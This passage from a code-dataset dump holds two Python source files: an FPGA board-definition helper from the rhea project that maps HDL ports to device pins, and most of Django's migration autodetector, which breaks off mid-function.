repo_name (string) | path (string) | copies (string) | size (string) | content (string) | license (string) | hash (int64) | line_mean (float64) | line_max (int64) | alpha_frac (float64) | autogenerated (bool)
---|---|---|---|---|---|---|---|---|---|---
cfelton/rhea | rhea/build/fpga.py | copies: 1 | size: 8511 |
#
# Copyright (c) 2014-2015 Christopher Felton
#
import os
import shutil
import inspect
from random import randint
from copy import copy
import myhdl
from myhdl._block import _Block as Block
from .extintf import Port
from .extintf import Clock
from .extintf import Reset
class FPGA(object):
""" """
vendor = "" # FPGA vendor, Altera, Xilinx, Lattice
device = "" # FPGA device type
family = "" # FPGA family
_name = None
# relate ports to the hardware pins
default_clocks = {}
default_resets = {}
default_ports = {}
default_extintf = {}
def __init__(self):
# default attributes
self.top = None # top-level myhdl module
self.top_params = None # top-level parameters
self.top_name = self._name # resulting name, project name etc.
self._clocks = {}
self._resets = {}
self._ports = {}
self._extintfs = {}
# walk through the default settings
for k, v in self.default_clocks.items():
self.add_clock(k, **v)
for k, v in self.default_resets.items():
self.add_reset(k, **v)
for k, v in self.default_ports.items():
self.add_port(k, **v)
for k, v in self.default_extintf.items():
self.add_extintf(k, v)
@property
def ports(self):
return self._ports
def get_port(self, port_name):
port = None
if port_name in self._ports:
port = self._ports[port_name]
return port
def has_top(self):
""" a top-level is set """
return self.top is not None
def set_top(self, top, **params):
self.top = top
self.top_params = params
if self.top_name is None:
self.top_name = top.func_name
def get_flow(self):
raise NotImplementedError
def _remove_embed_attr(self, pins, pattr):
""" removed an embedded pin attribute def if present.
"""
for v in pins:
if isinstance(v, dict):
pattr = v
pins.remove(v)
break
return pattr
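# Illustrative example (hypothetical pin values): a pin list may embed a dict of
# pin attributes, which this helper pulls out, e.g.
#     pins = [23, 24, {'pullup': True}]
#     pattr = self._remove_embed_attr(pins, pattr)
#     # pins is now [23, 24] and the returned pattr is {'pullup': True}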
def add_clock(self, name, frequency=1, pins=None, **pattr):
if isinstance(pins, (list,tuple)):
pins = pins[0]
assert isinstance(pins, (str,int)), "pins type %s" % (type(pins))
p = Port(name, pins, sigtype=Clock(0, frequency=frequency), **pattr)
self._clocks[name] = p
self._ports[name] = p
def add_reset(self, name, active, isasync, pins, **pattr):
assert isinstance(isasync, bool)
assert active in (0,1,)
p = Port(name, pins,
sigtype=Reset(0, active=active, isasync=isasync), **pattr)
# add to the reset and port dicts
self._resets[name] = p
self._ports[name] = p
def add_port(self, name, pins, **pattr):
""" add a port definition
A port definition maps a port (an HDL top-level signal name)
to a pin on the physical device including any attributes of
the pin / signal.
Example:
brd.add_port("gpio", pins=(23,24,25,26,), pullup=True)
It is not acceptable to have two ports with the same name;
adding a duplicate name trips the assertion below.
"""
if isinstance(pins, (str, int)):
pins = [pins,]
assert isinstance(pins, (list,tuple)), \
"pins must be a list/tuple of pins (or a single str/int)"
pins = list(pins)
pattr = self._remove_embed_attr(pins, pattr)
# make sure the pin list is a number or string
for v in pins:
assert isinstance(v, (str, int))
# @todo: raise an error instead of asserting
assert name not in self._ports, \
"{} already exists in {}".format(name, self._name)
self._ports[name] = Port(name, pins, **pattr)
def add_port_name(self, name, port, slc=None, **pattr):
""" add a new name, *name*, to an existing port, *port*.
This function is used when the default port name is known
but not the pins (if the pins are known use add_port).
A port name is linked to a default port name or a subset
(slice) is linked to the new name.
Example:
brd.add_port_name('led', 'wingC', 7)
where wingC is a 16-bit port bit-vector
To extract a range from the port, the slice class has to
be used, for example:
brd.add_port_name('MSB', 'wingC', slice(16,8))
"""
p = self._ports[port]
if slc is None:
pins = p.pins
else:
if isinstance(slc, (slice, int)):
pins = p.pins[slc]
elif isinstance(slc, (list, tuple)):
pins = []
for i in slc:
if isinstance(i, int):
pins.append(p.pins[i])
else:
pins += list(p.pins[i])
else:
raise Exception("slc must be an int, a slice, or a list of these")
kws = p.pattr.copy()
kws.update(pattr)
self.add_port(name, pins, **kws)
def rename_port(self, port, name, slc=None, **pattr):
""" rename a *port* to a new *name*
This function is useful for *bootstrapping*: bootstrapping
uses the port names that exist in the object and doesn't
have a method to select from multiple definitions. It is
also useful when the top-level HDL port names conflict.
"""
pass
def add_extintf(self, name, extintf):
"""
"""
self._extintfs[name] = extintf
# @todo: extract all the ports from the extintf and
# add them to the global port dict
pass
def get_portmap(self, top=None, **kwargs):
""" given a top-level map the port definitions
This module will map the top-level MyHDL module ports
to a board definition.
Example usage:
brd = rhea.build.get_board(<board name>)
portmap = brd.get_portmap(top=m_myhdl_module)
myhdl.toVerilog(m_myhdl_module, **portmap)
"""
if top is not None:
self.set_top(top)
# get the top-level ports and parameters
assert self.top is not None
pp = inspect.getargspec(self.top.func)
# all of the arguments (no default values) are treated as
# ports. This doesn't mean it needs to be a port but it
# is convention that ports are the arguments and parameters
# are keyword arguments. A parameter can exist in this
# list but it can't be empty ...
# @todo: this needs some more thought, keyword args might
# be ports, need a method to determine.
hdlports = {}
if pp.defaults is not None:
pl = len(pp.args)-len(pp.defaults)
else:
pl = len(pp.args)
for pn in pp.args[:pl]:
hdlports[pn] = None
params = {}
for ii, kw in enumerate(pp.args[pl:]):
params[kw] = pp.defaults[ii]
# see if any of the ports or parameters have been overridden
if self.top_params is not None:
for k, v in self.top_params.items():
if k in hdlports:
hdlports[k] = v
for k, v in self.top_params.items():
if k in params:
params[k] = v
for k, v in kwargs.items():
if k in hdlports:
hdlports[k] = v
for k, v in kwargs.items():
if k in params:
params[k] = v
# @todo: log this information, some parameters can be too large
# to be useful dumping to screen (print).
# log.write("HDL PORTS %s" % (hdlports,))
# log.write("HDL PARAMS %s" % (params,))
# match the fpga ports to the hdl ports; note: if a port is
# a keyword argument in the top-level this will fail
# @todo: this matching code needs to be enhanced, this should
# always match a top-level port to a port def.
for port_name,port in self._ports.items():
if port_name in hdlports:
hdlports[port_name] = port.sig
port.inuse = True
for k, v in hdlports.items():
assert v is not None, "Error unspecified port %s"%(k)
# combine the ports and params
pp = hdlports.copy()
pp.update(params)
return pp
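# The sketch below is illustrative only: the board name, part numbers, and pin
# assignments are made up, and my_top_module stands in for a user-supplied MyHDL design.
class ExampleBoard(FPGA):
    vendor = 'xilinx'
    family = 'spartan6'
    device = 'XC6SLX9'
    _name = 'example_board'
    # Each entry feeds add_clock / add_reset / add_port via __init__ above.
    default_clocks = {'clock': dict(frequency=50e6, pins=(126,))}
    default_resets = {'reset': dict(active=0, isasync=True, pins=(99,))}
    default_ports = {'led': dict(pins=(127, 131, 132, 133))}

# Typical flow (my_top_module would be a MyHDL module/block):
#     brd = ExampleBoard()
#     brd.add_port_name('led0', 'led', 0)           # alias one bit of 'led'
#     portmap = brd.get_portmap(top=my_top_module)
#     myhdl.toVerilog(my_top_module, **portmap)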
| license: mit | hash: -7,065,893,078,664,873,000 | line_mean: 32.116732 | line_max: 82 | alpha_frac: 0.546587 | autogenerated: false |
h4r5h1t/django-hauthy | django/db/migrations/autodetector.py | copies: 87 | size: 54478 |
from __future__ import unicode_literals
import datetime
import re
from itertools import chain
from django.conf import settings
from django.db import models
from django.db.migrations import operations
from django.db.migrations.migration import Migration
from django.db.migrations.operations.models import AlterModelOptions
from django.db.migrations.optimizer import MigrationOptimizer
from django.db.migrations.questioner import MigrationQuestioner
from django.utils import six
from .topological_sort import stable_topological_sort
class MigrationAutodetector(object):
"""
Takes a pair of ProjectStates, and compares them to see what the
first would need doing to make it match the second (the second
usually being the project's current state).
Note that this naturally operates on entire projects at a time,
as it's likely that changes interact (for example, you can't
add a ForeignKey without having a migration to add the table it
depends on first). A user interface may offer single-app usage
if it wishes, with the caveat that it may not always be possible.
"""
def __init__(self, from_state, to_state, questioner=None):
self.from_state = from_state
self.to_state = to_state
self.questioner = questioner or MigrationQuestioner()
def changes(self, graph, trim_to_apps=None, convert_apps=None, migration_name=None):
"""
Main entry point to produce a list of appliable changes.
Takes a graph to base names on and an optional set of apps
to try and restrict to (restriction is not guaranteed)
"""
changes = self._detect_changes(convert_apps, graph)
changes = self.arrange_for_graph(changes, graph, migration_name)
if trim_to_apps:
changes = self._trim_to_apps(changes, trim_to_apps)
return changes
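# Roughly how Django's makemigrations command drives this class (sketch only;
# MigrationLoader and ProjectState come from django.db.migrations and are not shown here):
#
#     loader = MigrationLoader(None, ignore_no_migrations=True)
#     autodetector = MigrationAutodetector(
#         loader.project_state(),          # from_state: what existing migrations describe
#         ProjectState.from_apps(apps),    # to_state: the current models.py state
#         questioner,
#     )
#     changes = autodetector.changes(graph=loader.graph, migration_name=None)
#     # changes maps app labels to lists of freshly generated Migration objects.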
def deep_deconstruct(self, obj):
"""
Recursive deconstruction for a field and its arguments.
Used for full comparison for rename/alter; sometimes a single-level
deconstruction will not compare correctly.
"""
if not hasattr(obj, 'deconstruct') or isinstance(obj, type):
return obj
deconstructed = obj.deconstruct()
if isinstance(obj, models.Field):
# we have a field which also returns a name
deconstructed = deconstructed[1:]
path, args, kwargs = deconstructed
return (
path,
[self.deep_deconstruct(value) for value in args],
{
key: self.deep_deconstruct(value)
for key, value in kwargs.items()
},
)
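# Example of what deep_deconstruct() produces for a simple field (illustrative):
#
#     models.CharField(max_length=100)
#     # -> ('django.db.models.CharField', [], {'max_length': 100})
#
# The leading field name returned by Field.deconstruct() is stripped, so two fields
# can be compared purely on path/args/kwargs when hunting for renames.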
def only_relation_agnostic_fields(self, fields):
"""
Return a definition of the fields that ignores field names and
what related fields actually relate to.
Used for detecting renames (as, of course, the related fields
change during renames)
"""
fields_def = []
for name, field in fields:
deconstruction = self.deep_deconstruct(field)
if field.rel and field.rel.to:
del deconstruction[2]['to']
fields_def.append(deconstruction)
return fields_def
def _detect_changes(self, convert_apps=None, graph=None):
"""
Returns a dict of migration plans which will achieve the
change from from_state to to_state. The dict has app labels
as keys and a list of migrations as values.
The resulting migrations aren't specially named, but the names
do matter for dependencies inside the set.
convert_apps is the list of apps to convert to use migrations
(i.e. to make initial migrations for, in the usual case)
graph is an optional argument that, if provided, can help improve
dependency generation and avoid potential circular dependencies.
"""
# The first phase is generating all the operations for each app
# and gathering them into a big per-app list.
# We'll then go through that list later and order it and split
# into migrations to resolve dependencies caused by M2Ms and FKs.
self.generated_operations = {}
# Prepare some old/new state and model lists, separating
# proxy models and ignoring unmigrated apps.
self.old_apps = self.from_state.concrete_apps
self.new_apps = self.to_state.apps
self.old_model_keys = []
self.old_proxy_keys = []
self.old_unmanaged_keys = []
self.new_model_keys = []
self.new_proxy_keys = []
self.new_unmanaged_keys = []
for al, mn in sorted(self.from_state.models.keys()):
model = self.old_apps.get_model(al, mn)
if not model._meta.managed:
self.old_unmanaged_keys.append((al, mn))
elif al not in self.from_state.real_apps:
if model._meta.proxy:
self.old_proxy_keys.append((al, mn))
else:
self.old_model_keys.append((al, mn))
for al, mn in sorted(self.to_state.models.keys()):
model = self.new_apps.get_model(al, mn)
if not model._meta.managed:
self.new_unmanaged_keys.append((al, mn))
elif (
al not in self.from_state.real_apps or
(convert_apps and al in convert_apps)
):
if model._meta.proxy:
self.new_proxy_keys.append((al, mn))
else:
self.new_model_keys.append((al, mn))
# Renames have to come first
self.generate_renamed_models()
# Prepare field lists, and prepare a list of the fields that used
# through models in the old state so we can make dependencies
# from the through model deletion to the field that uses it.
self.kept_model_keys = set(self.old_model_keys).intersection(self.new_model_keys)
self.kept_proxy_keys = set(self.old_proxy_keys).intersection(self.new_proxy_keys)
self.kept_unmanaged_keys = set(self.old_unmanaged_keys).intersection(self.new_unmanaged_keys)
self.through_users = {}
self.old_field_keys = set()
self.new_field_keys = set()
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
self.old_field_keys.update((app_label, model_name, x) for x, y in old_model_state.fields)
self.new_field_keys.update((app_label, model_name, x) for x, y in new_model_state.fields)
# Through model map generation
for app_label, model_name in sorted(self.old_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
for field_name, field in old_model_state.fields:
old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field(field_name)
if (hasattr(old_field, "rel") and getattr(old_field.rel, "through", None)
and not old_field.rel.through._meta.auto_created):
through_key = (
old_field.rel.through._meta.app_label,
old_field.rel.through._meta.model_name,
)
self.through_users[through_key] = (app_label, old_model_name, field_name)
# Generate non-rename model operations
self.generate_deleted_models()
self.generate_created_models()
self.generate_deleted_proxies()
self.generate_created_proxies()
self.generate_altered_options()
self.generate_altered_managers()
# Generate field operations
self.generate_renamed_fields()
self.generate_removed_fields()
self.generate_added_fields()
self.generate_altered_fields()
self.generate_altered_unique_together()
self.generate_altered_index_together()
self.generate_altered_db_table()
self.generate_altered_order_with_respect_to()
# Now, reordering to make things possible. The order we have already
# isn't bad, but we need to pull a few things around so FKs work nicely
# inside the same app
for app_label, ops in sorted(self.generated_operations.items()):
# construct a dependency graph for intra-app dependencies
dependency_graph = {op: set() for op in ops}
for op in ops:
for dep in op._auto_deps:
if dep[0] == app_label:
for op2 in ops:
if self.check_dependency(op2, dep):
dependency_graph[op].add(op2)
# we use a stable sort for deterministic tests & general behavior
self.generated_operations[app_label] = stable_topological_sort(ops, dependency_graph)
# Now, we need to chop the lists of operations up into migrations with
# dependencies on each other.
# We do this by stepping up an app's list of operations until we
# find one that has an outgoing dependency that isn't in another app's
# migration yet (hasn't been chopped off its list). We then chop off the
# operations before it into a migration and move onto the next app.
# If we loop back around without doing anything, there's a circular
# dependency (which _should_ be impossible as the operations are all
# split at this point so they can't depend and be depended on)
self.migrations = {}
num_ops = sum(len(x) for x in self.generated_operations.values())
chop_mode = False
while num_ops:
# On every iteration, we step through all the apps and see if there
# is a completed set of operations.
# If we find that a subset of the operations are complete we can
# try to chop it off from the rest and continue, but we only
# do this if we've already been through the list once before
# without any chopping and nothing has changed.
for app_label in sorted(self.generated_operations.keys()):
chopped = []
dependencies = set()
for operation in list(self.generated_operations[app_label]):
deps_satisfied = True
operation_dependencies = set()
for dep in operation._auto_deps:
is_swappable_dep = False
if dep[0] == "__setting__":
# We need to temporarily resolve the swappable dependency to prevent
# circular references. While keeping the dependency checks on the
# resolved model we still add the swappable dependencies.
# See #23322
resolved_app_label, resolved_object_name = getattr(settings, dep[1]).split('.')
original_dep = dep
dep = (resolved_app_label, resolved_object_name.lower(), dep[2], dep[3])
is_swappable_dep = True
if dep[0] != app_label and dep[0] != "__setting__":
# External app dependency. See if it's not yet
# satisfied.
for other_operation in self.generated_operations.get(dep[0], []):
if self.check_dependency(other_operation, dep):
deps_satisfied = False
break
if not deps_satisfied:
break
else:
if is_swappable_dep:
operation_dependencies.add((original_dep[0], original_dep[1]))
elif dep[0] in self.migrations:
operation_dependencies.add((dep[0], self.migrations[dep[0]][-1].name))
else:
# If we can't find the other app, we add a first/last dependency,
# but only if we've already been through once and checked everything
if chop_mode:
# If the app already exists, we add a dependency on the last migration,
# as we don't know which migration contains the target field.
# If it's not yet migrated or has no migrations, we use __first__
if graph and graph.leaf_nodes(dep[0]):
operation_dependencies.add(graph.leaf_nodes(dep[0])[0])
else:
operation_dependencies.add((dep[0], "__first__"))
else:
deps_satisfied = False
if deps_satisfied:
chopped.append(operation)
dependencies.update(operation_dependencies)
self.generated_operations[app_label] = self.generated_operations[app_label][1:]
else:
break
# Make a migration! Well, only if there's stuff to put in it
if dependencies or chopped:
if not self.generated_operations[app_label] or chop_mode:
subclass = type(str("Migration"), (Migration,), {"operations": [], "dependencies": []})
instance = subclass("auto_%i" % (len(self.migrations.get(app_label, [])) + 1), app_label)
instance.dependencies = list(dependencies)
instance.operations = chopped
self.migrations.setdefault(app_label, []).append(instance)
chop_mode = False
else:
self.generated_operations[app_label] = chopped + self.generated_operations[app_label]
new_num_ops = sum(len(x) for x in self.generated_operations.values())
if new_num_ops == num_ops:
if not chop_mode:
chop_mode = True
else:
raise ValueError("Cannot resolve operation dependencies: %r" % self.generated_operations)
num_ops = new_num_ops
# OK, add in internal dependencies among the migrations
for app_label, migrations in self.migrations.items():
for m1, m2 in zip(migrations, migrations[1:]):
m2.dependencies.append((app_label, m1.name))
# De-dupe dependencies
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.dependencies = list(set(migration.dependencies))
# Optimize migrations
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.operations = MigrationOptimizer().optimize(migration.operations, app_label=app_label)
return self.migrations
def check_dependency(self, operation, dependency):
"""
Returns ``True`` if the given operation depends on the given dependency,
``False`` otherwise.
"""
# Created model
if dependency[2] is None and dependency[3] is True:
return (
isinstance(operation, operations.CreateModel) and
operation.name_lower == dependency[1].lower()
)
# Created field
elif dependency[2] is not None and dependency[3] is True:
return (
(
isinstance(operation, operations.CreateModel) and
operation.name_lower == dependency[1].lower() and
any(dependency[2] == x for x, y in operation.fields)
) or
(
isinstance(operation, operations.AddField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
)
# Removed field
elif dependency[2] is not None and dependency[3] is False:
return (
isinstance(operation, operations.RemoveField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
# Removed model
elif dependency[2] is None and dependency[3] is False:
return (
isinstance(operation, operations.DeleteModel) and
operation.name_lower == dependency[1].lower()
)
# Field being altered
elif dependency[2] is not None and dependency[3] == "alter":
return (
isinstance(operation, operations.AlterField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
# order_with_respect_to being unset for a field
elif dependency[2] is not None and dependency[3] == "order_wrt_unset":
return (
isinstance(operation, operations.AlterOrderWithRespectTo) and
operation.name_lower == dependency[1].lower() and
(operation.order_with_respect_to or "").lower() != dependency[2].lower()
)
# Field is removed and part of an index/unique_together
elif dependency[2] is not None and dependency[3] == "foo_together_change":
return (
isinstance(operation, (operations.AlterUniqueTogether,
operations.AlterIndexTogether)) and
operation.name_lower == dependency[1].lower()
)
# Unknown dependency. Raise an error.
else:
raise ValueError("Can't handle dependency %r" % (dependency, ))
def add_operation(self, app_label, operation, dependencies=None, beginning=False):
# Dependencies are (app_label, model_name, field_name, create/delete as True/False)
operation._auto_deps = dependencies or []
if beginning:
self.generated_operations.setdefault(app_label, []).insert(0, operation)
else:
self.generated_operations.setdefault(app_label, []).append(operation)
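# Dependency tuples used throughout this class take the form
# (app_label, model_name, field_name_or_None, flag); illustrative values:
#
#     ('auth', 'user', None, True)         # the auth.User model must be created first
#     ('blog', 'post', 'author', False)    # the blog.Post.author field must be removed first
#     ('blog', 'post', 'author', 'alter')  # ...or altered first (see check_dependency above)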
def swappable_first_key(self, item):
"""
Sorting key function that places potential swappable models first in
lists of created models (only real way to solve #22783)
"""
try:
model = self.new_apps.get_model(item[0], item[1])
base_names = [base.__name__ for base in model.__bases__]
string_version = "%s.%s" % (item[0], item[1])
if (
model._meta.swappable or
"AbstractUser" in base_names or
"AbstractBaseUser" in base_names or
settings.AUTH_USER_MODEL.lower() == string_version.lower()
):
return ("___" + item[0], "___" + item[1])
except LookupError:
pass
return item
def generate_renamed_models(self):
"""
Finds any renamed models, and generates the operations for them,
and removes the old entry from the model lists.
Must be run before other model-level generation.
"""
self.renamed_models = {}
self.renamed_models_rel = {}
added_models = set(self.new_model_keys) - set(self.old_model_keys)
for app_label, model_name in sorted(added_models):
model_state = self.to_state.models[app_label, model_name]
model_fields_def = self.only_relation_agnostic_fields(model_state.fields)
removed_models = set(self.old_model_keys) - set(self.new_model_keys)
for rem_app_label, rem_model_name in removed_models:
if rem_app_label == app_label:
rem_model_state = self.from_state.models[rem_app_label, rem_model_name]
rem_model_fields_def = self.only_relation_agnostic_fields(rem_model_state.fields)
if model_fields_def == rem_model_fields_def:
if self.questioner.ask_rename_model(rem_model_state, model_state):
self.add_operation(
app_label,
operations.RenameModel(
old_name=rem_model_state.name,
new_name=model_state.name,
)
)
self.renamed_models[app_label, model_name] = rem_model_name
self.renamed_models_rel['%s.%s' % (rem_model_state.app_label, rem_model_state.name)] = '%s.%s' % (model_state.app_label, model_state.name)
self.old_model_keys.remove((rem_app_label, rem_model_name))
self.old_model_keys.append((app_label, model_name))
break
def generate_created_models(self):
"""
Find all new models (both managed and unmanaged) and make create
operations for them as well as separate operations to create any
foreign key or M2M relationships (we'll optimize these back in later
if we can).
We also defer any model options that refer to collections of fields
that might be deferred (e.g. unique_together, index_together).
"""
old_keys = set(self.old_model_keys).union(self.old_unmanaged_keys)
added_models = set(self.new_model_keys) - old_keys
added_unmanaged_models = set(self.new_unmanaged_keys) - old_keys
all_added_models = chain(
sorted(added_models, key=self.swappable_first_key, reverse=True),
sorted(added_unmanaged_models, key=self.swappable_first_key, reverse=True)
)
for app_label, model_name in all_added_models:
model_state = self.to_state.models[app_label, model_name]
model_opts = self.new_apps.get_model(app_label, model_name)._meta
# Gather related fields
related_fields = {}
primary_key_rel = None
for field in model_opts.local_fields:
if field.rel:
if field.rel.to:
if field.primary_key:
primary_key_rel = field.rel.to
elif not field.rel.parent_link:
related_fields[field.name] = field
# through will be none on M2Ms on swapped-out models;
# we can treat lack of through as auto_created=True, though.
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
for field in model_opts.local_many_to_many:
if field.rel.to:
related_fields[field.name] = field
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
# Are there unique/index_together to defer?
unique_together = model_state.options.pop('unique_together', None)
index_together = model_state.options.pop('index_together', None)
order_with_respect_to = model_state.options.pop('order_with_respect_to', None)
# Depend on the deletion of any possible proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Depend on the other end of the primary key if it's a relation
if primary_key_rel:
dependencies.append((
primary_key_rel._meta.app_label,
primary_key_rel._meta.object_name,
None,
True
))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[d for d in model_state.fields if d[0] not in related_fields],
options=model_state.options,
bases=model_state.bases,
managers=model_state.managers,
),
dependencies=dependencies,
beginning=True,
)
# Don't add operations which modify the database for unmanaged models
if not model_opts.managed:
continue
# Generate operations for each related field
for name, field in sorted(related_fields.items()):
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.rel.to._meta.app_label
dep_object_name = field.rel.to._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
dependencies.append((
field.rel.through._meta.app_label,
field.rel.through._meta.object_name,
None,
True
))
# Depend on our own model being created
dependencies.append((app_label, model_name, None, True))
# Make operation
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=name,
field=field,
),
dependencies=list(set(dependencies)),
)
# Generate other opns
related_dependencies = [
(app_label, model_name, name, True)
for name, field in sorted(related_fields.items())
]
related_dependencies.append((app_label, model_name, None, True))
if unique_together:
self.add_operation(
app_label,
operations.AlterUniqueTogether(
name=model_name,
unique_together=unique_together,
),
dependencies=related_dependencies
)
if index_together:
self.add_operation(
app_label,
operations.AlterIndexTogether(
name=model_name,
index_together=index_together,
),
dependencies=related_dependencies
)
if order_with_respect_to:
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=order_with_respect_to,
),
dependencies=[
(app_label, model_name, order_with_respect_to, True),
(app_label, model_name, None, True),
]
)
def generate_created_proxies(self):
"""
Makes CreateModel statements for proxy models.
We use the same statements as that way there's less code duplication,
but of course for proxy models we can skip all that pointless field
stuff and just chuck out an operation.
"""
added = set(self.new_proxy_keys) - set(self.old_proxy_keys)
for app_label, model_name in sorted(added):
model_state = self.to_state.models[app_label, model_name]
assert model_state.options.get("proxy", False)
# Depend on the deletion of any possible non-proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[],
options=model_state.options,
bases=model_state.bases,
managers=model_state.managers,
),
# Depend on the deletion of any possible non-proxy version of us
dependencies=dependencies,
)
def generate_deleted_models(self):
"""
Find all deleted models (managed and unmanaged) and make delete
operations for them as well as separate operations to delete any
foreign key or M2M relationships (we'll optimize these back in later
if we can).
We also bring forward removal of any model options that refer to
collections of fields - the inverse of generate_created_models().
"""
new_keys = set(self.new_model_keys).union(self.new_unmanaged_keys)
deleted_models = set(self.old_model_keys) - new_keys
deleted_unmanaged_models = set(self.old_unmanaged_keys) - new_keys
all_deleted_models = chain(sorted(deleted_models), sorted(deleted_unmanaged_models))
for app_label, model_name in all_deleted_models:
model_state = self.from_state.models[app_label, model_name]
model = self.old_apps.get_model(app_label, model_name)
if not model._meta.managed:
# Skip here, no need to handle fields for unmanaged models
continue
# Gather related fields
related_fields = {}
for field in model._meta.local_fields:
if field.rel:
if field.rel.to:
related_fields[field.name] = field
# through will be none on M2Ms on swapped-out models;
# we can treat lack of through as auto_created=True, though.
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
for field in model._meta.local_many_to_many:
if field.rel.to:
related_fields[field.name] = field
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
# Generate option removal first
unique_together = model_state.options.pop('unique_together', None)
index_together = model_state.options.pop('index_together', None)
if unique_together:
self.add_operation(
app_label,
operations.AlterUniqueTogether(
name=model_name,
unique_together=None,
)
)
if index_together:
self.add_operation(
app_label,
operations.AlterIndexTogether(
name=model_name,
index_together=None,
)
)
# Then remove each related field
for name, field in sorted(related_fields.items()):
self.add_operation(
app_label,
operations.RemoveField(
model_name=model_name,
name=name,
)
)
# Finally, remove the model.
# This depends on both the removal/alteration of all incoming fields
# and the removal of all its own related fields, and if it's
# a through model the field that references it.
dependencies = []
for related_object in model._meta.related_objects:
related_object_app_label = related_object.related_model._meta.app_label
object_name = related_object.related_model._meta.object_name
field_name = related_object.field.name
dependencies.append((related_object_app_label, object_name, field_name, False))
if not related_object.many_to_many:
dependencies.append((related_object_app_label, object_name, field_name, "alter"))
for name, field in sorted(related_fields.items()):
dependencies.append((app_label, model_name, name, False))
# We're referenced in another field's through=
through_user = self.through_users.get((app_label, model_state.name_lower), None)
if through_user:
dependencies.append((through_user[0], through_user[1], through_user[2], False))
# Finally, make the operation, deduping any dependencies
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
dependencies=list(set(dependencies)),
)
def generate_deleted_proxies(self):
"""
Makes DeleteModel statements for proxy models.
"""
deleted = set(self.old_proxy_keys) - set(self.new_proxy_keys)
for app_label, model_name in sorted(deleted):
model_state = self.from_state.models[app_label, model_name]
assert model_state.options.get("proxy", False)
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
)
def generate_renamed_fields(self):
"""
Works out renamed fields
"""
self.renamed_fields = {}
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Scan to see if this is actually a rename!
field_dec = self.deep_deconstruct(field)
for rem_app_label, rem_model_name, rem_field_name in sorted(self.old_field_keys - self.new_field_keys):
if rem_app_label == app_label and rem_model_name == model_name:
old_field_dec = self.deep_deconstruct(old_model_state.get_field_by_name(rem_field_name))
if field.rel and field.rel.to and 'to' in old_field_dec[2]:
old_rel_to = old_field_dec[2]['to']
if old_rel_to in self.renamed_models_rel:
old_field_dec[2]['to'] = self.renamed_models_rel[old_rel_to]
if old_field_dec == field_dec:
if self.questioner.ask_rename(model_name, rem_field_name, field_name, field):
self.add_operation(
app_label,
operations.RenameField(
model_name=model_name,
old_name=rem_field_name,
new_name=field_name,
)
)
self.old_field_keys.remove((rem_app_label, rem_model_name, rem_field_name))
self.old_field_keys.add((app_label, model_name, field_name))
self.renamed_fields[app_label, model_name, field_name] = rem_field_name
break
def generate_added_fields(self):
"""
Fields that have been added
"""
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
self._generate_added_field(app_label, model_name, field_name)
def _generate_added_field(self, app_label, model_name, field_name):
field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Fields that are foreignkeys/m2ms depend on stuff
dependencies = []
if field.rel and field.rel.to:
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.rel.to._meta.app_label
dep_object_name = field.rel.to._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
dependencies.append((
field.rel.through._meta.app_label,
field.rel.through._meta.object_name,
None,
True,
))
# You can't just add NOT NULL fields with no default or fields
# which don't allow empty strings as default.
preserve_default = True
if (not field.null and not field.has_default() and
not isinstance(field, models.ManyToManyField) and
not (field.blank and field.empty_strings_allowed)):
field = field.clone()
field.default = self.questioner.ask_not_null_addition(field_name, model_name)
preserve_default = False
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=field_name,
field=field,
preserve_default=preserve_default,
),
dependencies=dependencies,
)
def generate_removed_fields(self):
"""
Fields that have been removed.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys - self.new_field_keys):
self._generate_removed_field(app_label, model_name, field_name)
def _generate_removed_field(self, app_label, model_name, field_name):
self.add_operation(
app_label,
operations.RemoveField(
